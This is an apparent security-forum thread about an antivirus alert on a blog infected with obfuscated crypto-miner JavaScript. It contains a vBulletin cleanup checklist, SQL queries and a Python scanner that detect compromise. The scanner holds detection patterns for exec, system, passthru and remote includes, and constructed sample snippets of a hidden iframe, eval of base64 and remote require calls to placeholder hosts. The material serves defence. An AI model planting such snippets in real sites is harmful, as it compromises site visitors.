Hello,
I have a blog post at wxw.egyptsonline.com and I’ve got an Avast alert saying that it aborted the connection to wxw.egyptsonline.com because it was infected with JS:Downloader-FJP [Trj].
Wait for a final verdict from an avast team member, as we here are just volunteers with relevant knowledge, but cannot come and unblock; only avast team members can.
Quttera flags the website as suspicious, but the original scan was clean.
Detected crypto miner - 23 suspicious files → https://quttera.com/detailed_report/www.egyptsonline.com
Exactly the obfuscated code I mentioned earlier, from lines 1751-1765.
Detected is encoded JavaScript code, commonly used to hide suspicious behaviour, crypto-miner…
Cleanse that miner script off of your website,
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Thank you very much for responding.
I tried to remove many things but I still get the same alert, as well as avast preventing me from accessing your forum too.
Note: I bought my website template as it is without any changes, I don't know why that happens now.
@ romanynazmy4
Your attached image would suggest that you have a javascript element somewhere on the site.
Response from that link wouldn’t be immediate and you may not get a direct response, but that link is monitored by the virus labs team. There may be a delay given it is a weekend.
As mentioned, we would have to wait for input from avast.
This malware has been with us since 2003 and since has seen new variants appear:
As soon as Trojan.Downloader.JS.Agent enters your computer system, it creates a file named %System%.exe, %temp%wininet.dll and then it starts to make changes to the Windows Registry, by changes and additions to the registry.
So what is the nature of the obfuscated JavaScript code here?
To check a site for compromises follow these steps (a similar routine, here meant for vBulletin):
Run Suspect File Diagnostics under Maintenance → Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can’t identify as belonging to your addons.
Check the config.php for any suspicious code. It isn’t checked by the suspect file diagnostic.
Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type.
Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you. See step #7
Check your plugins for any base64 code. I recommend against using any plugins or products that include base64 code in them. However some “lite” or branded addons will include this as a means to prevent you from cheating the author. You’ll have to make a personal call on these if you use them. This is often a sign of a hacked site.
Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.
The following query can be run in phpMyAdmin and will provide results for steps 5 and 6 -
SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode LIKE '%pass_thru%' OR phpcode LIKE '%iframe%';
If you have a plugin that you can’t read or the code is obfuscated then you should probably contact the addon author. If it is assigned to the vBulletin, vBulletin CMS, vBulletin Blog or Skimlink products, delete it.
Using phpMyAdmin run this query: SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template LIKE '%pass_thru%' OR template LIKE '%iframe%';
It checks the templates for compromising code. You will need to review the results from this. If you can’t read it or the code is obfuscated then you should revert the template in the Admin CP.
Check .htaccess to make sure there are no redirects there.
Check all plugins in reference to cache or cookies. If they are similar to any of the above, delete them.
Info credits go to vbulletin support’s Trevor Hannant.
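As an added example (not code from this thread, from vBulletin or from Trevor Hannant), a small Python scanner that applies the checklist's indicators (base64, exec/system/passthru, iframe, remote include) to plugin and template rows such as the two phpMyAdmin queries return, honouring the list of templates where an iframe is expected. The sample rows are constructed, and the example.invalid hosts are placeholders.

```python
import re
# Indicator patterns adapted from the checklist above. The real PHP function is
# passthru(); pass_thru is matched too because the checklist spells it that way.
# Requiring "(" after exec/system avoids hits on plain words such as "execute",
# which the LIKE '%exec%' query would flag.
INDICATORS = {
    "exec_func": re.compile(r"\b(exec|system|passthru|pass_thru|shell_exec|popen)\s*\(", re.I),
    "eval": re.compile(r"\beval\s*\(", re.I),
    "base64": re.compile(r"base64", re.I),
    "iframe": re.compile(r"<\s*iframe\b", re.I),
    "remote_include": re.compile(r"\b(include|require)(_once)?\s*\(?\s*['\"]https?://", re.I),
    "long_blob": re.compile(r"[A-Za-z0-9+/=]{120,}"),  # long opaque string, typical of packed code
}

# Templates in which the checklist says an <iframe> is expected.
IFRAME_ALLOWED = {
    "bbcode_video", "editor-ie.css", "member.css", "stylegenerator.css", "vbcms.css",
    "vbulletin.css", "help_bbcodes", "humanverify_recaptcha", "search_common",
    "search_common_select_type",
}

def scan_record(name, code, kind="plugin"):
    """Return the indicator labels that fire for one plugin or template record."""
    hits = []
    for label, pattern in INDICATORS.items():
        if label == "iframe" and kind == "template" and name in IFRAME_ALLOWED:
            continue  # iframe is legitimate in these templates, skip it
        if pattern.search(code):
            hits.append(label)
    return hits

def scan_all(records):
    # records: iterable of (name, code, kind); returns {name: hits} for flagged rows only
    report = {}
    for name, code, kind in records:
        hits = scan_record(name, code, kind)
        if hits:
            report[name] = hits
    return report

# Constructed sample rows standing in for the output of the phpMyAdmin queries above.
SAMPLE = [
    ("Who's Online Tweak", "$vbulletin->options['wol'] = 1;", "plugin"),
    ("Cache Helper", "eval(base64_decode('aWYoIWlzc2V0KCRfQ09PS0lFWydhJ10pKXs='));", "plugin"),
    ("bbcode_video", '<iframe src="https://www.youtube.com/embed/{vb:raw id}"></iframe>', "template"),
    ("footer", '<iframe src="http://example.invalid/x.php" width="0" height="0"></iframe>', "template"),
    ("Stats Loader", "require_once('http://example.invalid/inc.txt');", "plugin"),
]

if __name__ == "__main__":
    print(scan_all(SAMPLE))
```

Anything flagged still needs a human read: base64 in a branded addon may be legitimate, as the checklist notes, whereas eval over a decoded blob in a plugin you did not install is the typical sign of a compromised site.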
Main issue mentioned there: “The page loads 11 third-party JavaScript files and 11 CSS but does not employ Sub-Resource Integrity to prevent breach if a third-party CDN is compromised”.
Suspicious pattern detected twice. Also confirmed with the Quttera scan result.
No, Pondus and polonus are different persons, but Pondus has been found many times to cooperate closely with polonus.
polonus is a third party cold reconnaissance scanner here in the Virus & Worms
while Pondus has a very fundamental knowledge of VirusTotal scan lore, which is often very helpful.
greetings from the surroundings of Rotterdam, Holland,